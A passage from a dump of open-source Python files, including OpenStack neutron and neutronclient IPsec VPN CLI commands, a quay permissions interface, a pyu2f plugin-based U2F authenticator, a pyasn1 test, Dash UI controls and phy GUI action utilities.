self._parser.print_help()
def load(app):
app.handler.register(Generate)
app.hook.register('pre_run', setup_template_items)
|
neutron/agent/ovsdb/native/helpers.py | congnt95/neutron | 1,080 | 8609 | # Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_config import cfg
from neutron.conf.agent import ovs_conf as agent_ovs_conf
from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf
from neutron.privileged.agent.ovsdb.native import helpers as priv_helpers
agent_ovs_conf.register_ovs_agent_opts(cfg.CONF)
ml2_ovs_conf.register_ovs_opts(cfg=cfg.CONF)
enable_connection_uri = functools.partial(
priv_helpers.enable_connection_uri,
log_fail_as_error=False, check_exit_code=False,
timeout=cfg.CONF.OVS.ovsdb_timeout,
inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)
|
migrations/20220114_03_Heqaz-insert-default-serverinfo.py | lin483/Funny-Nations | 126 | 8621 | <gh_stars>100-1000
"""
insert default serverInfo
"""
from yoyo import step
__depends__ = {'20220114_02_lHBKM-new-table-serverinfo'}
steps = [
step("INSERT INTO `serverInfo` (`onlineMinute`) VALUES (0);")
]
|
neutronclient/osc/v2/vpnaas/ipsec_site_connection.py | slawqo/python-neutronclient | 120 | 8622 | <gh_stars>100-1000
# Copyright 2017 FUJITSU LIMITED
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from osc_lib.cli import format_columns
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from osc_lib.utils import columns as column_util
from oslo_log import log as logging
from neutronclient._i18n import _
from neutronclient.common import utils as nc_utils
from neutronclient.osc import utils as osc_utils
from neutronclient.osc.v2.vpnaas import utils as vpn_utils
LOG = logging.getLogger(__name__)
_formatters = {
'peer_cidrs': format_columns.ListColumn
}
_attr_map = (
('id', 'ID', column_util.LIST_BOTH),
('name', 'Name', column_util.LIST_BOTH),
('peer_address', 'Peer Address', column_util.LIST_BOTH),
('auth_mode', 'Authentication Algorithm', column_util.LIST_BOTH),
('status', 'Status', column_util.LIST_BOTH),
('tenant_id', 'Project', column_util.LIST_LONG_ONLY),
('peer_cidrs', 'Peer CIDRs', column_util.LIST_LONG_ONLY),
('vpnservice_id', 'VPN Service', column_util.LIST_LONG_ONLY),
('ipsecpolicy_id', 'IPSec Policy', column_util.LIST_LONG_ONLY),
('ikepolicy_id', 'IKE Policy', column_util.LIST_LONG_ONLY),
('mtu', 'MTU', column_util.LIST_LONG_ONLY),
('initiator', 'Initiator', column_util.LIST_LONG_ONLY),
('admin_state_up', 'State', column_util.LIST_LONG_ONLY),
('description', 'Description', column_util.LIST_LONG_ONLY),
('psk', 'Pre-shared Key', column_util.LIST_LONG_ONLY),
('route_mode', 'Route Mode', column_util.LIST_LONG_ONLY),
('local_id', 'Local ID', column_util.LIST_LONG_ONLY),
('peer_id', 'Peer ID', column_util.LIST_LONG_ONLY),
('local_ep_group_id', 'Local Endpoint Group ID',
column_util.LIST_LONG_ONLY),
('peer_ep_group_id', 'Peer Endpoint Group ID', column_util.LIST_LONG_ONLY),
)
def _convert_to_lowercase(string):
return string.lower()
def _get_common_parser(parser, is_create=True):
parser.add_argument(
'--description',
metavar='<description>',
help=_('Description for the connection'))
parser.add_argument(
'--dpd',
metavar="action=ACTION,interval=INTERVAL,timeout=TIMEOUT",
type=nc_utils.str2dict_type(
optional_keys=['action', 'interval', 'timeout']),
help=vpn_utils.dpd_help("IPsec connection"))
parser.add_argument(
'--mtu',
help=_('MTU size for the connection'))
parser.add_argument(
'--initiator',
choices=['bi-directional', 'response-only'],
type=_convert_to_lowercase,
help=_('Initiator state'))
peer_group = parser.add_mutually_exclusive_group()
peer_group.add_argument(
'--peer-cidr',
dest='peer_cidrs',
help=_('Remote subnet(s) in CIDR format. '
'Cannot be specified when using endpoint groups. Only '
'applicable, if subnet provided for VPN service.')
)
peer_group.add_argument(
'--local-endpoint-group',
help=_('Local endpoint group (name or ID) with subnet(s) '
'for IPsec connection')
)
parser.add_argument(
'--peer-endpoint-group',
help=_('Peer endpoint group (name or ID) with CIDR(s) for '
'IPSec connection'))
admin_group = parser.add_mutually_exclusive_group()
admin_group.add_argument(
'--enable',
action='store_true',
help=_("Enable IPSec site connection")
)
admin_group.add_argument(
'--disable',
action='store_true',
help=_("Disable IPSec site connection")
)
parser.add_argument(
'--local-id',
help=_('An ID to be used instead of the external IP '
'address for a virtual router'))
return parser
def _get_common_attrs(client_manager, parsed_args, is_create=True):
attrs = {}
if is_create:
if 'project' in parsed_args and parsed_args.project is not None:
attrs['tenant_id'] = osc_utils.find_project(
client_manager.identity,
parsed_args.project,
parsed_args.project_domain,
).id
if parsed_args.description:
attrs['description'] = str(parsed_args.description)
if parsed_args.mtu:
attrs['mtu'] = parsed_args.mtu
if parsed_args.enable:
attrs['admin_state_up'] = True
if parsed_args.disable:
attrs['admin_state_up'] = False
if parsed_args.initiator:
attrs['initiator'] = parsed_args.initiator
if parsed_args.dpd:
vpn_utils.validate_dpd_dict(parsed_args.dpd)
attrs['dpd'] = parsed_args.dpd
if parsed_args.local_endpoint_group:
_local_epg = client_manager.neutronclient.find_resource(
'endpoint_group',
parsed_args.local_endpoint_group,
cmd_resource='endpoint_group')['id']
attrs['local_ep_group_id'] = _local_epg
if parsed_args.peer_endpoint_group:
_peer_epg = client_manager.neutronclient.find_resource(
'endpoint_group',
parsed_args.peer_endpoint_group,
cmd_resource='endpoint_group')['id']
attrs['peer_ep_group_id'] = _peer_epg
if parsed_args.peer_cidrs:
attrs['peer_cidrs'] = parsed_args.peer_cidrs
if parsed_args.local_id:
attrs['local_id'] = parsed_args.local_id
return attrs
class CreateIPsecSiteConnection(command.ShowOne):
_description = _("Create an IPsec site connection")
def get_parser(self, prog_name):
parser = super(CreateIPsecSiteConnection, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'--peer-id',
required=True,
help=_('Peer router identity for authentication. Can be '
'IPv4/IPv6 address, e-mail address, key id, or FQDN'))
parser.add_argument(
'--peer-address',
required=True,
help=_('Peer gateway public IPv4/IPv6 address or FQDN'))
parser.add_argument(
'--psk',
required=True,
help=_('Pre-shared key string.'))
parser.add_argument(
'--vpnservice',
metavar='VPNSERVICE',
required=True,
help=_('VPN service instance associated with this '
'connection (name or ID)'))
parser.add_argument(
'--ikepolicy',
metavar='IKEPOLICY',
required=True,
help=_('IKE policy associated with this connection (name or ID)'))
parser.add_argument(
'--ipsecpolicy',
metavar='IPSECPOLICY',
required=True,
help=_('IPsec policy associated with this connection '
'(name or ID)'))
parser.add_argument(
'name',
metavar='<name>',
help=_('Set friendly name for the connection'))
osc_utils.add_project_owner_option_to_parser(parser)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager, parsed_args)
if parsed_args.vpnservice:
_vpnservice_id = client.find_resource(
'vpnservice',
parsed_args.vpnservice,
cmd_resource='vpnservice')['id']
attrs['vpnservice_id'] = _vpnservice_id
if parsed_args.ikepolicy:
_ikepolicy_id = client.find_resource(
'ikepolicy',
parsed_args.ikepolicy,
cmd_resource='ikepolicy')['id']
attrs['ikepolicy_id'] = _ikepolicy_id
if parsed_args.ipsecpolicy:
_ipsecpolicy_id = client.find_resource(
'ipsecpolicy',
parsed_args.ipsecpolicy,
cmd_resource='ipsecpolicy')['id']
attrs['ipsecpolicy_id'] = _ipsecpolicy_id
if parsed_args.peer_id:
attrs['peer_id'] = parsed_args.peer_id
if parsed_args.peer_address:
attrs['peer_address'] = parsed_args.peer_address
if parsed_args.psk:
attrs['psk'] = parsed_args.psk
if parsed_args.name:
attrs['name'] = parsed_args.name
if (bool(parsed_args.local_endpoint_group) !=
bool(parsed_args.peer_endpoint_group)):
message = _("You must specify both local and peer endpoint "
"groups")
raise exceptions.CommandError(message)
if not parsed_args.peer_cidrs and not parsed_args.local_endpoint_group:
message = _("You must specify endpoint groups or peer CIDR(s)")
raise exceptions.CommandError(message)
obj = client.create_ipsec_site_connection(
{'ipsec_site_connection': attrs})['ipsec_site_connection']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns, formatters=_formatters)
return display_columns, data
class DeleteIPsecSiteConnection(command.Command):
_description = _("Delete IPsec site connection(s)")
def get_parser(self, prog_name):
parser = super(DeleteIPsecSiteConnection, self).get_parser(prog_name)
parser.add_argument(
'ipsec_site_connection',
metavar='<ipsec-site-connection>',
nargs='+',
help=_('IPsec site connection to delete (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
result = 0
for ipsec_conn in parsed_args.ipsec_site_connection:
try:
ipsec_con_id = client.find_resource(
'ipsec_site_connection',
ipsec_conn,
cmd_resource='ipsec_site_connection')['id']
client.delete_ipsec_site_connection(ipsec_con_id)
except Exception as e:
result += 1
LOG.error(_("Failed to delete IPsec site connection with "
"name or ID '%(ipsec_site_conn)s': %(e)s"),
{'ipsec_site_conn': ipsec_conn, 'e': e})
if result > 0:
total = len(parsed_args.ipsec_site_connection)
msg = (_("%(result)s of %(total)s IPsec site connection failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListIPsecSiteConnection(command.Lister):
_description = _("List IPsec site connections "
"that belong to a given project")
def get_parser(self, prog_name):
parser = super(ListIPsecSiteConnection, self).get_parser(prog_name)
parser.add_argument(
'--long',
action='store_true',
default=False,
help=_("List additional fields in output")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
obj = client.list_ipsec_site_connections()['ipsec_site_connections']
headers, columns = column_util.get_column_definitions(
_attr_map, long_listing=parsed_args.long)
return (headers, (utils.get_dict_properties(
s, columns, formatters=_formatters) for s in obj))
class SetIPsecSiteConnection(command.Command):
_description = _("Set IPsec site connection properties")
def get_parser(self, prog_name):
parser = super(SetIPsecSiteConnection, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'--peer-id',
help=_('Peer router identity for authentication. Can be '
'IPv4/IPv6 address, e-mail address, key id, or FQDN'))
parser.add_argument(
'--peer-address',
help=_('Peer gateway public IPv4/IPv6 address or FQDN'))
parser.add_argument(
'--name',
metavar='<name>',
help=_('Set friendly name for the connection'))
parser.add_argument(
'ipsec_site_connection',
metavar='<ipsec-site-connection>',
help=_('IPsec site connection to set (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager,
parsed_args, is_create=False)
if parsed_args.peer_id:
attrs['peer_id'] = parsed_args.peer_id
if parsed_args.peer_address:
attrs['peer_address'] = parsed_args.peer_address
if parsed_args.name:
attrs['name'] = parsed_args.name
ipsec_conn_id = client.find_resource(
'ipsec_site_connection', parsed_args.ipsec_site_connection,
cmd_resource='ipsec_site_connection')['id']
try:
client.update_ipsec_site_connection(
ipsec_conn_id,
{'ipsec_site_connection': attrs})
except Exception as e:
msg = (_("Failed to set IPsec site "
"connection '%(ipsec_conn)s': %(e)s")
% {'ipsec_conn': parsed_args.ipsec_site_connection, 'e': e})
raise exceptions.CommandError(msg)
class ShowIPsecSiteConnection(command.ShowOne):
_description = _("Show information of a given IPsec site connection")
def get_parser(self, prog_name):
parser = super(ShowIPsecSiteConnection, self).get_parser(prog_name)
parser.add_argument(
'ipsec_site_connection',
metavar='<ipsec-site-connection>',
help=_('IPsec site connection to display (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
ipsec_site_id = client.find_resource(
'ipsec_site_connection', parsed_args.ipsec_site_connection,
cmd_resource='ipsec_site_connection')['id']
obj = client.show_ipsec_site_connection(
ipsec_site_id)['ipsec_site_connection']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns, formatters=_formatters)
return (display_columns, data)
|
endpoints/api/permission_models_interface.py | giuseppe/quay | 2,027 | 8631 | <gh_stars>1000+
import sys
from abc import ABCMeta, abstractmethod
from collections import namedtuple
from six import add_metaclass
class SaveException(Exception):
def __init__(self, other):
self.traceback = sys.exc_info()
super(SaveException, self).__init__(str(other))
class DeleteException(Exception):
def __init__(self, other):
self.traceback = sys.exc_info()
super(DeleteException, self).__init__(str(other))
class Role(namedtuple("Role", ["role_name"])):
def to_dict(self):
return {
"role": self.role_name,
}
class UserPermission(
namedtuple(
"UserPermission",
[
"role_name",
"username",
"is_robot",
"avatar",
"is_org_member",
"has_org",
],
)
):
def to_dict(self):
perm_dict = {
"role": self.role_name,
"name": self.username,
"is_robot": self.is_robot,
"avatar": self.avatar,
}
if self.has_org:
perm_dict["is_org_member"] = self.is_org_member
return perm_dict
class RobotPermission(
namedtuple(
"RobotPermission",
[
"role_name",
"username",
"is_robot",
"is_org_member",
],
)
):
def to_dict(self, user=None, team=None, org_members=None):
return {
"role": self.role_name,
"name": self.username,
"is_robot": True,
"is_org_member": self.is_org_member,
}
class TeamPermission(
namedtuple(
"TeamPermission",
[
"role_name",
"team_name",
"avatar",
],
)
):
def to_dict(self):
return {
"role": self.role_name,
"name": self.team_name,
"avatar": self.avatar,
}
@add_metaclass(ABCMeta)
class PermissionDataInterface(object):
"""
Data interface used by permissions API.
"""
@abstractmethod
def get_repo_permissions_by_user(self, namespace_name, repository_name):
"""
Args:
namespace_name: string
repository_name: string
Returns:
list(UserPermission)
"""
@abstractmethod
def get_repo_roles(self, username, namespace_name, repository_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
Returns:
list(Role) or None
"""
@abstractmethod
def get_repo_permission_for_user(self, username, namespace_name, repository_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
Returns:
UserPermission
"""
@abstractmethod
def set_repo_permission_for_user(self, username, namespace_name, repository_name, role_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
role_name: string
Returns:
UserPermission
Raises:
SaveException
"""
@abstractmethod
def delete_repo_permission_for_user(self, username, namespace_name, repository_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
Returns:
void
Raises:
DeleteException
"""
@abstractmethod
def get_repo_permissions_by_team(self, namespace_name, repository_name):
"""
Args:
namespace_name: string
repository_name: string
Returns:
list(TeamPermission)
"""
@abstractmethod
def get_repo_role_for_team(self, team_name, namespace_name, repository_name):
"""
Args:
team_name: string
namespace_name: string
repository_name: string
Returns:
Role
"""
@abstractmethod
def set_repo_permission_for_team(self, team_name, namespace_name, repository_name, permission):
"""
Args:
team_name: string
namespace_name: string
repository_name: string
permission: string
Returns:
TeamPermission
Raises:
SaveException
"""
@abstractmethod
def delete_repo_permission_for_team(self, team_name, namespace_name, repository_name):
"""
Args:
team_name: string
namespace_name: string
repository_name: string
Returns:
TeamPermission
Raises:
DeleteException
"""
|
desktop/core/ext-py/pyu2f-0.1.4/pyu2f/convenience/customauthenticator.py | yetsun/hue | 5,079 | 8643 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to offload the end to end flow of U2F signing."""
import base64
import hashlib
import json
import os
import struct
import subprocess
import sys
from pyu2f import errors
from pyu2f import model
from pyu2f.convenience import baseauthenticator
SK_SIGNING_PLUGIN_ENV_VAR = 'SK_SIGNING_PLUGIN'
U2F_SIGNATURE_TIMEOUT_SECONDS = 5
SK_SIGNING_PLUGIN_NO_ERROR = 0
SK_SIGNING_PLUGIN_TOUCH_REQUIRED = 0x6985
SK_SIGNING_PLUGIN_WRONG_DATA = 0x6A80
class CustomAuthenticator(baseauthenticator.BaseAuthenticator):
"""Offloads U2F signing to a pluggable command-line tool.
Offloads U2F signing to a signing plugin which takes the form of a
command-line tool. The command-line tool is configurable via the
SK_SIGNING_PLUGIN environment variable.
The signing plugin should implement the following interface:
Communication occurs over stdin/stdout, and messages are both sent and
received in the form:
[4 bytes - payload size (little-endian)][variable bytes - json payload]
Signing Request JSON
{
"type": "sign_helper_request",
"signData": [{
"keyHandle": <url-safe base64-encoded key handle>,
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"version": U2F protocol version (usually "U2F_V2")
},...],
"timeoutSeconds": <security key touch timeout>
}
Signing Response JSON
{
"type": "sign_helper_reply",
"code": <result code>.
"errorDetail": <text description of error>,
"responseData": {
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"keyHandle": <url-safe base64-encoded key handle>,
"version": <U2F protocol version>,
"signatureData": <url-safe base64-encoded signature>
}
}
Possible response error codes are:
NoError = 0
UnknownError = -127
TouchRequired = 0x6985
WrongData = 0x6a80
"""
def __init__(self, origin):
self.origin = origin
def Authenticate(self, app_id, challenge_data,
print_callback=sys.stderr.write):
"""See base class."""
# Ensure environment variable is present
plugin_cmd = os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR)
if plugin_cmd is None:
raise errors.PluginError('{} env var is not set'
.format(SK_SIGNING_PLUGIN_ENV_VAR))
# Prepare input to signer
client_data_map, signing_input = self._BuildPluginRequest(
app_id, challenge_data, self.origin)
# Call plugin
print_callback('Please insert and touch your security key\n')
response = self._CallPlugin([plugin_cmd], signing_input)
# Handle response
key_challenge_pair = (response['keyHandle'], response['challengeHash'])
client_data_json = client_data_map[key_challenge_pair]
client_data = client_data_json.encode()
return self._BuildAuthenticatorResponse(app_id, client_data, response)
def IsAvailable(self):
"""See base class."""
return os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR) is not None
def _BuildPluginRequest(self, app_id, challenge_data, origin):
"""Builds a JSON request in the form that the plugin expects."""
client_data_map = {}
encoded_challenges = []
app_id_hash_encoded = self._Base64Encode(self._SHA256(app_id))
for challenge_item in challenge_data:
key = challenge_item['key']
key_handle_encoded = self._Base64Encode(key.key_handle)
raw_challenge = challenge_item['challenge']
client_data_json = model.ClientData(
model.ClientData.TYP_AUTHENTICATION,
raw_challenge,
origin).GetJson()
challenge_hash_encoded = self._Base64Encode(
self._SHA256(client_data_json))
# Populate challenges list
encoded_challenges.append({
'appIdHash': app_id_hash_encoded,
'challengeHash': challenge_hash_encoded,
'keyHandle': key_handle_encoded,
'version': key.version,
})
# Populate ClientData map
key_challenge_pair = (key_handle_encoded, challenge_hash_encoded)
client_data_map[key_challenge_pair] = client_data_json
signing_request = {
'type': 'sign_helper_request',
'signData': encoded_challenges,
'timeoutSeconds': U2F_SIGNATURE_TIMEOUT_SECONDS,
'localAlways': True
}
return client_data_map, json.dumps(signing_request)
def _BuildAuthenticatorResponse(self, app_id, client_data, plugin_response):
"""Builds the response to return to the caller."""
encoded_client_data = self._Base64Encode(client_data)
signature_data = str(plugin_response['signatureData'])
key_handle = str(plugin_response['keyHandle'])
response = {
'clientData': encoded_client_data,
'signatureData': signature_data,
'applicationId': app_id,
'keyHandle': key_handle,
}
return response
def _CallPlugin(self, cmd, input_json):
"""Calls the plugin and validates the response."""
# Calculate length of input
input_length = len(input_json)
length_bytes_le = struct.pack('<I', input_length)
request = length_bytes_le + input_json.encode()
# Call plugin
sign_process = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout = sign_process.communicate(request)[0]
exit_status = sign_process.wait()
# Parse and validate response size
response_len_le = stdout[:4]
response_len = struct.unpack('<I', response_len_le)[0]
response = stdout[4:]
if response_len != len(response):
raise errors.PluginError(
'Plugin response length {} does not match data {} (exit_status={})'
.format(response_len, len(response), exit_status))
# Ensure valid json
try:
json_response = json.loads(response.decode())
except ValueError:
raise errors.PluginError('Plugin returned invalid output (exit_status={})'
.format(exit_status))
# Ensure response type
if json_response.get('type') != 'sign_helper_reply':
raise errors.PluginError('Plugin returned invalid response type '
'(exit_status={})'
.format(exit_status))
# Parse response codes
result_code = json_response.get('code')
if result_code is None:
raise errors.PluginError('Plugin missing result code (exit_status={})'
.format(exit_status))
# Handle errors
if result_code == SK_SIGNING_PLUGIN_TOUCH_REQUIRED:
raise errors.U2FError(errors.U2FError.TIMEOUT)
elif result_code == SK_SIGNING_PLUGIN_WRONG_DATA:
raise errors.U2FError(errors.U2FError.DEVICE_INELIGIBLE)
elif result_code != SK_SIGNING_PLUGIN_NO_ERROR:
raise errors.PluginError(
'Plugin failed with error {} - {} (exit_status={})'
.format(result_code,
json_response.get('errorDetail'),
exit_status))
# Ensure response data is present
response_data = json_response.get('responseData')
if response_data is None:
raise errors.PluginErrors(
'Plugin returned output with missing responseData (exit_status={})'
.format(exit_status))
return response_data
def _SHA256(self, string):
"""Helper method to perform SHA256."""
md = hashlib.sha256()
md.update(string.encode())
return md.digest()
def _Base64Encode(self, bytes_data):
"""Helper method to base64 encode, strip padding, and return str
result."""
return base64.urlsafe_b64encode(bytes_data).decode().rstrip('=')
|
desktop/core/ext-py/pyasn1-0.4.6/tests/type/test_namedval.py | yetsun/hue | 5,079 | 8694 | <filename>desktop/core/ext-py/pyasn1-0.4.6/tests/type/test_namedval.py<gh_stars>1000+
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2019, <NAME> <<EMAIL>>
# License: http://snmplabs.com/pyasn1/license.html
#
import sys
try:
import unittest2 as unittest
except ImportError:
import unittest
from tests.base import BaseTestCase
from pyasn1.type import namedval
class NamedValuesCaseBase(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.e = namedval.NamedValues(('off', 0), ('on', 1))
def testDict(self):
assert set(self.e.items()) == set([('off', 0), ('on', 1)])
assert set(self.e.keys()) == set(['off', 'on'])
assert set(self.e) == set(['off', 'on'])
assert set(self.e.values()) == set([0, 1])
assert 'on' in self.e and 'off' in self.e and 'xxx' not in self.e
assert 0 in self.e and 1 in self.e and 2 not in self.e
def testInit(self):
assert namedval.NamedValues(off=0, on=1) == {'off': 0, 'on': 1}
assert namedval.NamedValues('off', 'on') == {'off': 0, 'on': 1}
assert namedval.NamedValues(('c', 0)) == {'c': 0}
assert namedval.NamedValues('a', 'b', ('c', 0), d=1) == {'c': 0, 'd': 1, 'a': 2, 'b': 3}
def testLen(self):
assert len(self.e) == 2
assert len(namedval.NamedValues()) == 0
def testAdd(self):
assert namedval.NamedValues(off=0) + namedval.NamedValues(on=1) == {'off': 0, 'on': 1}
def testClone(self):
assert namedval.NamedValues(off=0).clone(('on', 1)) == {'off': 0, 'on': 1}
assert namedval.NamedValues(off=0).clone(on=1) == {'off': 0, 'on': 1}
def testStrRepr(self):
assert str(self.e)
assert repr(self.e)
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite)
|
apps/dash-port-analytics/app/ui/tab_map_controls.py | JeroenvdSande/dash-sample-apps | 2,332 | 8721 | <reponame>JeroenvdSande/dash-sample-apps
import dash_core_components as dcc
import dash_html_components as html
from config import strings
def make_tab_port_map_controls(
port_arr: list,
port_val: str,
vessel_types_arr: list,
vessel_type_val: str,
year_arr: list,
year_val: int,
month_arr: list,
month_val: int,
) -> html.Div:
"""
Returns a HTML div of user controls found on top of the map tab.
:param port_arr: list, all possible ports
:param port_val: str, current port value
:param vessel_types_arr: list, all possible vessel types
:param vessel_type_val: str, current vessel type value
:param year_arr: list, all possible years
:param year_val: str, current year value
:param month_arr: list, all possible months
:param month_val: str, current month value
:return: HTML div
"""
return html.Div(
className="tab-port-map-controls",
children=[
html.Div(
className="tab-port-map-single-control-container area-a",
children=[
html.Label(
className="control-label", children=[strings.LABEL_PORT]
),
dcc.Dropdown(
id="port-map-dropdown-port",
clearable=False,
options=[{"label": port, "value": port} for port in port_arr],
value=port_val,
),
],
),
html.Div(className="tab-port-map-single-control-separator area-b"),
html.Div(
className="tab-port-map-single-control-container area-c",
children=[
html.Label(
className="control-label", children=[strings.LABEL_VESSEL]
),
dcc.Dropdown(
id="port-map-dropdown-vessel-type",
clearable=False,
options=[
{"label": vessel_type, "value": vessel_type}
for vessel_type in vessel_types_arr
],
value=vessel_type_val,
),
],
),
html.Div(className="tab-port-map-single-control-separator area-d"),
html.Div(
className="tab-port-map-single-control-container date-grid area-e",
children=[
html.Div(
className="tab-port-map-single-control-container-date",
children=[
html.Label(
className="control-label", children=[strings.LABEL_YEAR]
),
dcc.Dropdown(
id="port-map-dropdown-year",
clearable=False,
options=[
{"label": year, "value": year} for year in year_arr
],
value=year_val,
),
],
),
html.Div(
className="tab-port-map-single-control-separator smaller-line"
),
html.Div(
className="tab-port-map-single-control-container-date",
children=[
html.Label(
className="control-label",
children=[strings.LABEL_MONTH],
),
dcc.Dropdown(
id="port-map-dropdown-month",
clearable=False,
options=[
{"label": month, "value": month}
for month in month_arr
],
value=month_val,
),
],
),
],
),
],
)
|
phy/gui/actions.py | ycanerol/phy | 118 | 8738 | <filename>phy/gui/actions.py
# -*- coding: utf-8 -*-
"""Actions and snippets."""
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
import inspect
from functools import partial, wraps
import logging
import re
import sys
import traceback
from .qt import QKeySequence, QAction, require_qt, input_dialog, busy_cursor, _get_icon
from phylib.utils import Bunch
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
# Snippet parsing utilities
# -----------------------------------------------------------------------------
def _parse_arg(s):
"""Parse a number or string."""
try:
return int(s)
except ValueError:
pass
try:
return float(s)
except ValueError:
pass
return s
def _parse_list(s):
"""Parse a comma-separated list of values (strings or numbers)."""
# Range: 'x-y'
if '-' in s:
m, M = map(_parse_arg, s.split('-'))
return list(range(m, M + 1))
# List of ids: 'x,y,z'
elif ',' in s:
return list(map(_parse_arg, s.split(',')))
else:
return _parse_arg(s)
def _parse_snippet(s):
"""Parse an entire snippet command."""
return tuple(map(_parse_list, s.split(' ')))
def _prompt_args(title, docstring, default=None):
"""Display a prompt dialog requesting function arguments.
'default' is a function returning the default value for the proposed input dialog.
"""
# There are args, need to display the dialog.
# Extract Example: `...` in the docstring to put a predefined text
# in the input dialog.
logger.debug("Prompting arguments for %s", title)
r = re.search('Example: `([^`]+)`', docstring)
docstring_ = docstring[:r.start()].strip() if r else docstring
try:
text = str(default()) if default else (r.group(1) if r else None)
except Exception as e: # pragma: no cover
logger.error("Error while handling user input: %s", str(e))
return
s, ok = input_dialog(title, docstring_, text)
if not ok or not s:
return
# Parse user-supplied arguments and call the function.
args = _parse_snippet(s)
return args
# -----------------------------------------------------------------------------
# Show shortcut utility functions
# -----------------------------------------------------------------------------
def _get_shortcut_string(shortcut):
"""Return a string representation of a shortcut."""
if not shortcut:
return ''
if isinstance(shortcut, (tuple, list)):
return ', '.join([_get_shortcut_string(s) for s in shortcut])
if isinstance(shortcut, str):
if hasattr(QKeySequence, shortcut):
shortcut = QKeySequence(getattr(QKeySequence, shortcut))
else:
return shortcut.lower()
assert isinstance(shortcut, QKeySequence)
s = shortcut.toString() or ''
return str(s).lower()
def _get_qkeysequence(shortcut):
"""Return a QKeySequence or list of QKeySequence from a shortcut string."""
if shortcut is None:
return []
if isinstance(shortcut, (tuple, list)):
return [_get_qkeysequence(s) for s in shortcut]
assert isinstance(shortcut, str)
if hasattr(QKeySequence, shortcut):
return QKeySequence(getattr(QKeySequence, shortcut))
sequence = QKeySequence.fromString(shortcut)
assert not sequence.isEmpty()
return sequence
def _show_shortcuts(shortcuts):
"""Display shortcuts."""
out = []
for n in sorted(shortcuts):
shortcut = _get_shortcut_string(shortcuts[n])
if not n.startswith('_') and not shortcut.startswith('-'):
out.append('- {0:<40} {1:s}'.format(n, shortcut))
if out:
print('Keyboard shortcuts')
print('\n'.join(out))
print('')
def _show_snippets(snippets):
"""Display snippets."""
out = []
for n in sorted(snippets):
snippet = snippets[n]
if not n.startswith('_'):
out.append('- {0:<40} :{1:s}'.format(n, snippet))
if out:
print('Snippets')
print('\n'.join(out))
print('')
def show_shortcuts_snippets(actions):
"""Show the shortcuts and snippets of an Actions instance."""
print(actions.name)
print('-' * len(actions.name))
print()
_show_shortcuts(actions.shortcuts)
_show_snippets(actions._default_snippets)
# -----------------------------------------------------------------------------
# Actions
# -----------------------------------------------------------------------------
def _alias(name):
# Get the alias from the character after & if it exists.
alias = name[name.index('&') + 1] if '&' in name else name
alias = alias.replace(' ', '_').lower()
return alias
def _expected_args(f):
if isinstance(f, partial):
argspec = inspect.getfullargspec(f.func)
else:
argspec = inspect.getfullargspec(f)
f_args = argspec.args
if 'self' in f_args:
f_args.remove('self')
# Remove arguments with defaults from the list.
if len(argspec.defaults or ()):
f_args = f_args[:-len(argspec.defaults)]
# Remove arguments supplied in a partial.
if isinstance(f, partial):
f_args = f_args[len(f.args):]
f_args = [arg for arg in f_args if arg not in f.keywords]
return tuple(f_args)
@require_qt
def _create_qaction(gui, **kwargs):
# Create the QAction instance.
name = kwargs.get('name', '')
name = name[0].upper() + name[1:].replace('_', ' ')
action = QAction(name, gui)
